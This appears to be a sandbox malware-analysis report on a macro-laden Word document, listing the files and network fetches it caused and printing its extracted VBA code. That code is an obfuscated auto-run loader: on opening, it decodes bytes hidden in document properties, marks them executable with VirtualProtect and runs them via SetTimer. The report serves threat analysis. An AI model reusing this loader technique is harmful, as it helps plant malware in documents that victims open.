                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Fri Aug 12 01:59:11 2022, 0x1205a4 type
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):306553
                                                                                                                                                        Entropy (8bit):2.6527023369025584
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:VjL4UE6KH2bnsSiG0xty9CF+AI3Sx3w5CjtyWnnZj7p5tVvQGYehT:VzE6F9rctymoSLjtJZj7LhYehT
                                                                                                                                                        MD5:0E6F88ACF9FA9C8B3CEBC90B5A551E09
                                                                                                                                                        SHA1:54C2E1F48112E383766187CC025B0514D164BDDD
                                                                                                                                                        SHA-256:79433D518689C5DF597DD314CB17529E505D73D24DF3C5D272763DDB50583745
                                                                                                                                                        SHA-512:384F8DCC7C55BE7FFDA837B0DFA261B0000EBD119EADD4DD9F8D788A898E37C9C27030C074BC347BCE32E3A9C69B1FF6580E403DCBE57B85AB053F97A82AB457
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:MDMP....... .........b.........................;...............F......................`.......8...........T...........................DH..........0J...................................................................U...........B.......J......GenuineIntelW...........T.......\.....b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER980A.tmp.WERInternalMetadata.xml

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):8348
                                                                                                                                                        Entropy (8bit):3.709926400831255
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:Rrl7r3GLNiUC6k6YTaSUOggmf7SDTCpDK89b9isf1/m:RrlsNip6k6YOSUOggmf7SDo9hfQ
                                                                                                                                                        MD5:E716E2FE7257341D1DE1B62C1430DA3F
                                                                                                                                                        SHA1:243865FDF0A967BED04F022CA74D75D759579C19
                                                                                                                                                        SHA-256:E87D4EC52A44A06A2DD0B71185095219B8E14CEDFAC16EB4CE013942FDF125B8
                                                                                                                                                        SHA-512:6559307BB2B4DDCE13B6D41FCC37C9ECE196000105B9D938356256E760F8D1DA41F40C0CC9F34C9ECB633878A2CFB3111997196331D801F1AC7DFC64E7455D2C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.0.8.<./.P.i.d.>.......

                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER9962.tmp.xml

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4671
                                                                                                                                                        Entropy (8bit):4.5295296067639015
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:cvIwSD8zsaJgtWI9jrWgc8sqYj/8fm8M4Jx7FNV+q88U58UvFeVqd:uITfoEagrsqYwJ/UTvoqd
                                                                                                                                                        MD5:0013CEC3EB6831E813B3A8FA514E3AAD
                                                                                                                                                        SHA1:1C70C828985F6ED1FE68B5405238B0F38FBFAB71
                                                                                                                                                        SHA-256:DA9A2C5C4613EBFE4BAF57447901018DA53F1E774A8EEAE1C1979AF4A3C7DEC5
                                                                                                                                                        SHA-512:5E36622299DF4C146DB647F73718E452EB7C9995ACBFB33C2B656DC0DDC3BB85B16AE4B0F7D7B0D474A86F7E31004F800B24414C4E41B2DBBB20D3FC54993A1A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1643709" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\2687EECC-4F43-442C-AA69-7E12CA414CA2

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):148061
                                                                                                                                                        Entropy (8bit):5.358162199787249
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:gcQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:T1Q9DQe+zuXYr
                                                                                                                                                        MD5:621F80E05552B3ECF353464BC4E9B294
                                                                                                                                                        SHA1:1E83E9E01E369F73C7C858E0ACC9FBD90BFF127D
                                                                                                                                                        SHA-256:D38400A3A86BD0DD654C844D8F867F49C6E428661BC88F9D8B335E2C0D7BC02B
                                                                                                                                                        SHA-512:AD6FE0EF23749D635FE1B3A6B57BA1013B735026F921CECAFD0026FE4E3645CB45C2FB8AAF07B0C8130111A4DC6549D49561A08DA05B477543DE93B16E7770AE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-11T16:58:39">.. Build: 16.0.15607.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\-f[1].htm

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                        Category:downloaded
                                                                                                                                                        Size (bytes):201
                                                                                                                                                        Entropy (8bit):5.120826232488609
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3LZKCezocKqD:J0+oxBeRmR9etdzRxLFez1T
                                                                                                                                                        MD5:33A7649A487B43D650E4D478C96E4588
                                                                                                                                                        SHA1:F10EA1CC461B73EEE86CBE992CC4724F7B4C5175
                                                                                                                                                        SHA-256:469501F44D054081AD49D1D0AB0B8031ECCE6986D17D346CC39DFB7BCF327F76
                                                                                                                                                        SHA-512:24CDCCA259970B669949BD197AA55FD6E05D91B53A05984D3EBB3B219B6D26BDD67165967F1C8960D55E517D7AC46E1E515DD6E5C45DE4923F2FB1B1A98BCF22
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        IE Cache URL:http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
                                                                                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "-f" was not found on this server.</p>.</body></html>.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\yD159.tmp.dll

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):201
                                                                                                                                                        Entropy (8bit):5.120826232488609
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3LZKCezocKqD:J0+oxBeRmR9etdzRxLFez1T
                                                                                                                                                        MD5:33A7649A487B43D650E4D478C96E4588
                                                                                                                                                        SHA1:F10EA1CC461B73EEE86CBE992CC4724F7B4C5175
                                                                                                                                                        SHA-256:469501F44D054081AD49D1D0AB0B8031ECCE6986D17D346CC39DFB7BCF327F76
                                                                                                                                                        SHA-512:24CDCCA259970B669949BD197AA55FD6E05D91B53A05984D3EBB3B219B6D26BDD67165967F1C8960D55E517D7AC46E1E515DD6E5C45DE4923F2FB1B1A98BCF22
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "-f" was not found on this server.</p>.</body></html>.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):115
                                                                                                                                                        Entropy (8bit):4.643502388640172
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:bDuMJlLWRBKHIALRlj9TLBCmX10JFRBKHIALRlj9TLBCv:bCAeB7ALr9HBSbB7ALr9HBs
                                                                                                                                                        MD5:3CB5E2D635FB7887310A38F71EA6ADDD
                                                                                                                                                        SHA1:3B07E380CE6B8C0E07368C0CF952F496E21ADFD7
                                                                                                                                                        SHA-256:54314B21351BEC27FE14EB4EA2EC466892A9B1B433C85699C6920071C9D21871
                                                                                                                                                        SHA-512:9676D4A3881D1D7D41D56472BC45083BE30382DED70C564B69277826AF4A8B04B46E684C436ED932C679414319C0F8CD01D1CA9E210F2A54A663A7B964D45921
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[folders]..Templates.LNK=0..valliant.document.08.11.2022.doc.LNK=0..[doc]..valliant.document.08.11.2022.doc.LNK=0..

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\valliant.document.08.11.2022.doc.LNK

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:42 2022, mtime=Fri Aug 12 00:58:40 2022, atime=Fri Aug 12 00:58:35 2022, length=2221348, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1145
                                                                                                                                                        Entropy (8bit):4.699008530144123
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:8TnHckRUVuElPCH2bQept1Yv0hX+WpQQzps0gjAU/4B789LtH0ID9l5v4t2Y+xI/:8zHzfepfhLQQt6AUc89fDXH7aB6m
                                                                                                                                                        MD5:D68B1F3E3D0554FA7E1A874C499BD3CF
                                                                                                                                                        SHA1:D492C29EBCC85549BC4ABBFDDE00832D29A58364
                                                                                                                                                        SHA-256:4DC8E47EB7BDE47F406129F5670874BE7CA488A4AD50A1B60F0A535D77DF2E5C
                                                                                                                                                        SHA-512:42753C655E1A3DB8D2E99136D762D42FCF0ADD441585714A5091FA8D17C9F4B22DAD635A450C0823AF11EFA5A5527C786CAFBA1839551F272F59F220CC130AF9
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:L..................F.... ....zm..3....K......*....$.!..........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...UK.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..UK......S....................mK..h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..UK......Y..............>.......t.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.$.!..UR. .VALLIA~1.DOC..r......hT...UR.....h.......................g.v.a.l.l.i.a.n.t...d.o.c.u.m.e.n.t...0.8...1.1...2.0.2.2...d.o.c.......f...............-.......e...........>.S......C:\Users\user\Desktop\valliant.document.08.11.2022.doc..7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.v.a.l.l.i.a.n.t...d.o.c.u.m.e.n.t...0.8...1.1...2.0.2.2...d.o.c.........:..,.LB.)...As...`.......X.......992547...........!a..%.H.VZAj................-..!a..%.H.VZAj................-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.1657932117250045
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/ZdxiDyvtlliVX9lqKYistr:RtZziDOiI2sR
                                                                                                                                                        MD5:23A678C8A7437AA29240B630EDC73E46
                                                                                                                                                        SHA1:2D47627B182956BFD3B6001F05E6598F87049A91
                                                                                                                                                        SHA-256:31B3A272B06650F92E6076C59E89ADA8E5E567ECE563EE8D5D890ACBDADE5104
                                                                                                                                                        SHA-512:663F4931E8A9A8BC685EA6F6B2F58AC9EFF4242B845DE184B70AE02E99716AFA80226179554500C5FAEE6C11E0E156E77209AEB86ECBB8C313390B732C2C343A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.pratesh................................................p.r.a.t.e.s.h...........N.............................9.J.............$.......6C......=.v.............T...

                                                                                                                                                        C:\Users\user\Desktop\~$lliant.document.08.11.2022.doc

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.1657932117250045
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/ZdxiDyvtlliVX9lqKYistr:RtZziDOiI2sR
                                                                                                                                                        MD5:23A678C8A7437AA29240B630EDC73E46
                                                                                                                                                        SHA1:2D47627B182956BFD3B6001F05E6598F87049A91
                                                                                                                                                        SHA-256:31B3A272B06650F92E6076C59E89ADA8E5E567ECE563EE8D5D890ACBDADE5104
                                                                                                                                                        SHA-512:663F4931E8A9A8BC685EA6F6B2F58AC9EFF4242B845DE184B70AE02E99716AFA80226179554500C5FAEE6C11E0E156E77209AEB86ECBB8C313390B732C2C343A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.pratesh................................................p.r.a.t.e.s.h...........N.............................9.J.............$.......6C......=.v.............T...

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:Zip archive data, at least v2.0 to extract
                                                                                                                                                        Entropy (8bit):7.993464543538008
                                                                                                                                                        TrID:
                                                                                                                                                        • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                        • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                        • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                        File name:valliant.document.08.11.2022.doc
                                                                                                                                                        File size:2316502
                                                                                                                                                        MD5:cadb9d5ed47b8df81a2addefed302a03
                                                                                                                                                        SHA1:f7197fa991510f99f25af2b502c40d3b48d1abbc
                                                                                                                                                        SHA256:9cb01729327bd958e32aa9481d5a81303627ab7a59b9ae134fb6600ef4e5b680
                                                                                                                                                        SHA512:1b5ed9721c8d1aed9d09a850cb43afd6d756bbf6957ca6d8321c1fb5ea89a88a448f0aaa60348a70e30eda299c554619961c89b12888ea2ad6a6a5d058a54b07
                                                                                                                                                        SSDEEP:49152:7t3L6IYFlSbzCFelOb0h5CZTsXG97qRbET6DLZ6dGbrG5j:BPYYgelO9T6G97qVg6DLZ6dGbyh
                                                                                                                                                        TLSH:6DB533ED89E8E561F1433E32380557F3A45410D6EA5AC84A30C6FFC197962BB36E4F92
                                                                                                                                                        File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                        Static OLE Info

                                                                                                                                                        General

                                                                                                                                                        Document Type:OpenXML
                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                        OLE File "/opt/package/joesandbox/database/analysis/682606/sample/valliant.document.08.11.2022.doc"

                                                                                                                                                        Indicators
                                                                                                                                                        Has Summary Info:
                                                                                                                                                        Application Name:
                                                                                                                                                        Encrypted Document:False
                                                                                                                                                        Contains Word Document Stream:True
                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                        Contains ObjectPool Stream:False
                                                                                                                                                        Flash Objects Count:0
                                                                                                                                                        Contains VBA Macros:True

                                                                                                                                                        Streams with VBA

                                                                                                                                                        VBA File Name: ThisDocument.cls, Stream Size: 2826
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/ThisDocument
                                                                                                                                                        VBA File Name:ThisDocument.cls
                                                                                                                                                        Stream Size:2826
                                                                                                                                                        Data ASCII:. . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t . i o n > . . . . . . . . . L . i b " u s e r . 3 2 " A l i a . s " S e t T i . m e r " ( B y 8 V a l . . . . A s L o n g . , . . . . 3 . 9 . .
                                                                                                                                                        Data Raw:01 fa b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54
                                                                                                                                                        VBA Code
                                                                                                                                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function  Lib "user32" Alias "SetTimer" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "kernel32" Alias "VirtualProtect" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr,  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "user32" Alias "KillTimer" (ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
Function ()
     = 3
    End Function
Function ()
     = 1
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), tITeCC_iA6p("evEOscajIaM"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Private Sub Document_Open()
    Dim () As Byte
    If () Then
         = ((tITeCC_iA6p("mA_pgtw")).Value)
    Else
         = ((tITeCC_iA6p("OdDR074uBd2")).Value)
    End If
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
     = () + 1
     = VarPtr((0))
     , , 64, VarPtr()
            ()(tITeCC_iA6p("FGl4jDQ7Mmwn")) = tITeCC_iA6p("YLVAyGrkn61")
         = (0, , 1, )
     1
     0, 
    ().Remove (tITeCC_iA6p("gvpStqlxPSc"))
    ().Remove (tITeCC_iA6p("YkqBj2Ce"))
    ReDim (1)
End Sub
Function ()
     = 6
    End Function
Function (Optional  = False)
    If  Then
        Set  = ActiveDocument
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function ()
     = 5
    End Function
Function ()
     = 4
    End Function
Function ()
    ReDim (() - 1) As Byte
    Dim  As Long,  As Long
    Dim :  = tITeCC_iA6p("fSySVCQ33") & tITeCC_iA6p("iXr1MTmM")
    For  = 0 To () - 1 Step 2
         =  / 2
        () = 255 - ( & (, ) & (,  + 1))
    Next
     = 
End Function
Function (, , Optional  = False)
    If  Then
         = Mid(,  + 1, 1)
    Else
         = ((), , )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
         = Len()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, )
     = Mid(,  + 1, 1)
End Function
Function (, Optional  = False)
    If  Then
        Set  = GetObject()
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
     = 10
    End Function
Function (, Optional  = False)
    If  Then
         = CDec()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 7
    End Function
Function (, Optional  = Empty, Optional  = Empty, Optional  = Empty)
    Select Case 
            Case ()
                Set  = (, True)
            Case ()
                Set  = (, True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, , True)
            Case ()
                 = (True)
            Case ()
                 = (, True)
        End Select
End Function
Function ()
     = 0
    End Function
Function ()
     = 11
    End Function
Function (, Optional  = False)
    If  Then
         = VarPtr()
    Else
         = ((), )
    End If
     = 
    End Function
Sub (w)
    Dim  As Long
    Dim  As Long
     = () + ()
    Do
         = ()
        DoEvents
    Loop Until  > 
End Sub
Function (, Optional  = False)
    If  Then
         = ()
    Else
         = ((), )
    End If
     = 
    End Function
Function (Optional  = False)
    If  Then
        Set  = CallByName((tITeCC_iA6p("ArNmaAhd3cdR")), tITeCC_iA6p("BCdu5uMzXrdf"), VbGet, tITeCC_iA6p("exLSMEco"))
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Public Function tITeCC_iA6p(strInput)
        tITeCC_iA6p = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
    End Function
Function (Optional  = False)
    If  Then
         = Timer()
    Else
         = (())
    End If
     = 
    End Function
Function ()
    #If Win64 Then
         = True
    #Else
         = False
    #End If
End Function
Function ()
     = 8
    End Function
Function ()
     = 2
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), tITeCC_iA6p("VYLYrWqAG19hy"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
     = 9
    End Function
Function (, Optional  = False)
    If  Then
         = UBound()
    Else
         = ((), )
    End If
     = 
    End Function

                                                                                                                                                        Streams

                                                                                                                                                        Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 369
                                                                                                                                                        General
                                                                                                                                                        Stream Path:PROJECT
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Stream Size:369
                                                                                                                                                        Entropy:5.261233037013654
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:I D = " { 8 B 8 0 C 6 E 6 - B 7 5 8 - 4 1 8 F - A 2 4 D - 0 6 C 5 2 D 3 9 3 F 8 5 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 5 0 7 D 9 E 6 D B E F D F E F D F E F D F E F D F " . . D P B = " 0 A 0 8 D 6 E 1 D A E 2 D A E 2 D A " . . G C = " 0 F 0 D D 3 E C D D F 4 E 3 F 5 E 3 F 5 1 C " . . . . [ H o s t E x t e n d e r I n f
                                                                                                                                                        Data Raw:49 44 3d 22 7b 38 42 38 30 43 36 45 36 2d 42 37 35 38 2d 34 31 38 46 2d 41 32 34 44 2d 30 36 43 35 32 44 33 39 33 46 38 35 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                                                                                                                        Stream Path: PROJECTwm, File Type: data, Stream Size: 41
                                                                                                                                                        General
                                                                                                                                                        Stream Path:PROJECTwm
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:41
                                                                                                                                                        Entropy:3.0773844850752607
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                                                                                                        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                                                                                                                        Stream Path: VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                        File Type:ISO-8859 text, with no line terminators
                                                                                                                                                        Stream Size:7
                                                                                                                                                        Entropy:1.8423709931771088
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:a . . .
                                                                                                                                                        Data Raw:cc 61 ff ff 00 00 00
                                                                                                                                                        Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 5100
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/__SRP_2
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:5100
                                                                                                                                                        Entropy:1.9259173726592043
                                                                                                                                                        Base64 Encoded:False
